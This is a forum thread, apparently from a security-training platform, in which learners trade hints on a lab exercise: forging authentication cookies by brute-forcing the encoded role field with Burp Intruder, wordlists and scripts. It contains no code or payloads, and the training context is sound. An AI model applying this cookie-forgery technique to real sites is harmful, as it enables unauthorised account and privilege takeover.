BROKEN AUTHENTICATION [academy]. Bruteforcing Cookies

I’m stucking “Bruteforcing Cookies” section at 1-st question.
I intercepted and decoded the cookies. Then I set up an attack in burp intruder (screenshot).

For bruteforce, I generated a unix timestamp within ± 10 minutes from the intercepted cookie.
I changed the prefix. I’ve tried different usermane (htbuser, htbadmin, empty value), different role (admin, super user, superuser, sudo, su, empty value). But always the server response is no different.
Could someone give a hint in which direction to move to solve this question

You are correct to think that you have to try different values for role, I think you haven’t found the correct one to use there.

1 Like

Thank you, I was moving in this direction and found the right role.

I’m stucking “Bruteforcing Cookies” section too.
I cant get a flag for htbadmin trying different super user’s roles like root, sudo, su, superuser, super user, admin, administrator using a python script from the section and filtering “HTB” flag string in responds and brutforcing the last 5 numbers of the timepstamp. I believe, cookie encoding flow is correctly as it has the same format as a cookie for user:htbuser with the role:student and I can see discovering name and role in responses.

Please, hint somebody where I do wrong!?

just fuzzing the roles is enough or should fuzz the timestamp as you did?
Tried many different roles: admin, superuser, root, professor, dean, but nothing gave me the flag :frowning:

If you haven’t found the right value yet, then I’ll tell you that the timestamp is not important. Focus on the role, it’s something related to “super user”

Can someone provide a hint here? Trying everything related to the role…nothing working

A wordlist from seclist might help for brute-forcing the role.

Any idea which one? I’ve tried them all with no luck :roll_eyes: :roll_eyes:

Probably wordlists containing “superuser” (or similar). If your wordlist doesn’t still work, you should double-check your code. Perhaps you miss a step in your encoding process or you have a bug.

Watch out for newline (“\n”) in some wordlists, this will corrupt your payload.

Try to analyze your requests/responses using a proxy, wireshark, tcpdump,…

Yeah I can’t find anything wrong with the cookies or encoding I’m using. When I brute force I output the cookie I develop to the screen and use a user and role that I KNOW will work…it’s one of the support users that I have got the password for. So I log in and copy the encoded cookie from the browser. Then I run my script to output the cookie I build for the same user and role - the browser cookie for that user and role and my coded cookie are identical, so I know my script works correctly. I just don’t seem to be able to find a working role.

Have you checked that there is no newline in your wordlist? Encoding with “\n” leads to different results… The server doesn’t strip the input…
That was one of my big issues (Thanks to burpsuite, I could find and fix it).

Yes my code was fine…I completed it now…I didn’t have the correct users…

I try with role “root, sudo, su, superuser, admin, administrator, htbadmin and super user”.
With lot of user: htbuser, htbadmin, user, superuser
Nothing work, can you help me pls?

Read the Predictable Usernames section of the Bruteforcing Usernames page.

I am in need of some help here as well… I have two questions. First is how do I automate testing the cookies with the different levels of encoding needed? Do I need to modify the python script and if so can someone help me as to how? I can do it manually using burp decoder or cyberchef but I am sure there is a way to automate it… Second question is what list should I be using? I tried all the superuser combinations listed in CommonAdminBase64.txt but nothing seems to be giving me a flag… Thanks!

There are clues to the format of the usernames in that section. I scripted mine. I think there is a script in the materials they named something like I modified a version of that to get it to work.

BurpSuite provides a method of automating encoding/encryption. Its part of the Intruder program. Under the payloads tab, look for Payload Processing.

You can add different encoding tasks to each payload before it gets sent.

Ok I was on the right track then, hopefully. I was playing with that but only was encoding the “role” part of the payload. I couldn’t figure out how to encode the rest of the payload that I was not changing. So If I set multiple payload positions, use pitchfork attack and just have the data stay static everywhere aside from the role (which I would use the word-list on) maybe that would work? I am going to give it a try. I did read that section on predictable usernames a couple times now, I’ll give it a fresh look and see if I can figure out what word-list to use. I would love to learn how to script it as well but I will try burp first. Thanks for the help!

You can add a prefix and suffix to a list and then further processing will encode the whole list

1 Like